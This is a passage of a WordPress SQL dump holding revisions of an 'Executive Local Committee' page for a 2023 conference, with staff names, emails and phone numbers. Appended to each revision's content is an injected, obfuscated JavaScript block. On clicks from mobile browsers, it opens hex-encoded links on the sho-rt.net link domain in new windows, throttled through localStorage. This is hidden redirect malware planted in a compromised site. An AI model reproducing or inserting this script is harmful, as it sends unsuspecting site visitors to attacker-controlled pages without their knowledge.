function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:03:01','2023-06-27 10:03:01','',4849,'https://gsw2023.com/?p=4893',0,'revision','',0),
(4894,4,'2023-06-27 10:07:55','2023-06-27 10:07:55','[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span>\r\nVice President for Post Graduate and Scientific Research\r\nArab Academy for Science, Technology and Maritime Transport\r\nP.O.Box 1029, Alexandria, Egypt\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860438415{padding-right: 10px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span>\r\n<span style=\"font-size: 12pt;\">nashwa.elbendary@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860447378{padding-right: 10px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span>\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860457870{padding-right: 10px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span>\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860469553{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span>\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span>\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Executive Local Committee','','inherit','closed','closed','','4849-revision-v1','','','2023-06-27 10:07:55','2023-06-27 10:07:55','',4849,'https://gsw2023.com/?p=4894',0,'revision','',0),
(4895,4,'2023-06-27 10:09:18','2023-06-27 10:09:18','<p>[vc_row][vc_column width=\"1/4\"][vc_column_text css=\".vc_custom_1687856703448{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Chair</strong></span></p>\r\n<p>[/vc_column_text][vc_single_image image=\"4614\" img_size=\"\" alignment=\"center\" style=\"vc_box_rounded\" image_hovers=\"false\" el_class=\"full-width\"][/vc_column][vc_column width=\"3/4\"][vc_column_text el_class=\"zero-pad\"]<span style=\"font-size: 12pt; color: #000000;\"><em><strong>Prof. Dr. Alaa Abdelwahed Abdelbary</strong></em></span><br />\r\nVice President for Post Graduate and Scientific Research<br />\r\nArab Academy for Science, Technology and Maritime Transport<br />\r\nP.O.Box 1029, Alexandria, Egypt</p>\r\n<table style=\"margin: 0px; padding: 0px;\">\r\n<tbody>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>E-mail:</strong></td>\r\n<td style=\"width: 26%;\">aaelbary@aast.edu</td>\r\n<td style=\"width: 26%;\">aaelbary@gsw2023.com</td>\r\n<td style=\"width: 26%;\">gsw2023@aast.edu</td>\r\n</tr>\r\n<tr>\r\n<td style=\"width: 20%;\"><strong>Contacts:</strong></td>\r\n<td style=\"width: 26%;\">Office: +203 5497598</td>\r\n<td style=\"width: 26%;\">Fax: +203 5497598</td>\r\n<td style=\"width: 26%;\">Mobile: +20 100 7382 198</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=\".vc_custom_1687858969667{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\r\n<h3 style=\"font-weight: 400; text-align: center;\"><span style=\"color: #000000;\"><strong>Scientific Affairs</strong></span></h3>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\" css=\".vc_custom_1687860528620{padding-right: 5px !important;}\"][vc_column_text]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/dr-nashwa-1.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Nashwa El-Bendary</strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">nashwa.elbendary@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860537997{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Yahya_Photo_Enhanced3.png\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Yahya Z. Mohasseb </strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">ymohasseb@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201227217550</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860547068{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/amira_ibrahim_zaki.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Prof. Amira Zaki</strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">amzak10@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201006619608</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/4\" css=\".vc_custom_1687860553730{padding-right: 5px !important;padding-left: 5px !important;}\"][vc_column_text]</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td><img class=\"img_card_1\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/radwa_ahmed_osman.jpg\" alt=\"\" width=\"110px\" height=\"150px\" /></td>\r\n<td><span style=\"color: #000000; font-size: 12pt;\"><em><strong>Dr. Radwa Osman </strong></em></span><br />\r\n<span style=\"font-size: 12pt;\">radwa.ahmed@aast.edu</span><br />\r\n<span style=\"font-size: 12pt;\">+201001552854</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 